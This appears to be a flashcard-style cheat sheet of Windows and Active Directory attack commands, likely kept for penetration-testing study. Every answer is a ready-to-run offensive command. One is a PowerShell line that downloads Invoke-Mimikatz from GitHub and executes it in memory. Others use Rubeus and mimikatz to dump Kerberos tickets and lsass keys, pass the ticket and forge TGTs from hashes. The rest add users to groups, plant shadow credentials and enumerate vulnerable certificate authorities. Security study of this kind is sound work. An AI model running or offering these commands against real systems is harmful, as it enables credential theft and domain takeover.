Windows Hacking Commands

Question 1

Mimikatz fileless download powershell

Answer 1

(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1’) | IEX

Question 2

How to dump kerberos tickets from memory?

Answer 2

Rubeus.exe dump

Question 3

How to dump only TGTs from memory?

Answer 3

Rubeus.exe dump /tgt

Question 4

How to use a ticket (pass the ticket)?

Answer 4

Rubeus.exe ptt /ticket:”C:\path\to\ticket.kirbi”

Question 5

How to make a kerberos ticket from an NTLM hash?

Answer 5

Rubeus.exe asktgt /domain:[domain] /user:[user] /rc4:[hash] /ptt

Question 6

How to create a fake logon session with rubeus?

Answer 6

Rubeus.exe createnetonly /program:”C:\Windows\System32\cmd.exe” /show

Question 7

How to make a TGT with a key?

Answer 7

Rubeus.exe asktgt /domain:[domain] /user:[user] /aes256:[AES_KEY] /ptt

Question 8

How to dump kerberos keys from lsass?

Answer 8

mimikatz.exe privilege::debug sekurlsa::ekeys exit

Question 9

How to extract kerberos tickets from active users on a windows host?

Answer 9

Rubeus.exe harvest /interval:30 /nowrap

Question 10

Get groups of user AD

Answer 10

ldapsearch -x -H ldap://[ip] -D [authuser]@[domain] -w [authpass] -b DC=[domain],DC=[domain] ‘(sAMAccountName=[user])’ memberOf

Question 11

Whats the syntax of ldapsearch

Answer 11

ldapsearch, auth_method, ldap_url, auth_user, auth_pass, base, filter, attribute

Question 12

how to add a user to a group AD

Answer 12

net rpc group addmem [group] [user] -U [domain]/[user]%[password] -S [dc]

Question 13

Add shadow creds to user AD

Answer 13

certipy shadow auto -username [user]@[domain] -p [pass] -account [target_user] -dc-ip [dc]

Question 14

Enumerate CA vulnerabilities (ESC)

Answer 14

certipy find -vulnerable -u [user]@[domain] -hashes [NT_hash] -dc-ip [dc]